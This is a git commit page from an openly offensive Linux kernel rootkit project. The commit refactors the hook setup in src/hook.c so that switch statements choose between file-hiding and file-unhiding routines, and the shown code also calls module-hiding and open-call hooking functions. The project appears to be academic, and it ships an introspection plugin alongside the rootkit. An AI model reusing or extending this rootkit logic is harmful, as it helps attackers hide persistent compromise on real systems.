linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 6d6245ba66ce76362c89d51607113d7c9a871c82
parent a12402c5ac4d2ec9a49d4c19b60d5f42ba5578dc
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 23:14:25 +0100

refactors code

Diffstat:

Msrc/hook.c | 18++++++++++--------


1 file changed, 10 insertions(+), 8 deletions(-)

diff --git a/src/hook.c b/src/hook.c
@@ -80,10 +80,11 @@ init_hooks(void)
     if (rootkit.hiding_module)
         hide_module();
 
-    if (rootkit.hiding_files == FH_TABLE)
-        hide_files();
-    else if (rootkit.hiding_files == FH_LSTAR)
-        hide_files_lstar();
+    switch (rootkit.hiding_files) {
+    case FH_TABLE: hide_files();       break;
+    case FH_LSTAR: hide_files_lstar(); break;
+    default: break;
+    }
 
     if (rootkit.hiding_open)
         hide_open();
@@ -113,10 +114,11 @@ remove_hooks(void)
     if (rootkit.hiding_module)
         unhide_module();
 
-    if (rootkit.hiding_files == FH_TABLE)
-        unhide_files();
-    else if(rootkit.hiding_files == FH_LSTAR)
-        unhide_files_lstar();
+    switch (rootkit.hiding_files) {
+    case FH_TABLE: unhide_files();       break;
+    case FH_LSTAR: unhide_files_lstar(); break;
+    default: break;
+    }
 
     if (rootkit.hiding_open)
         unhide_open();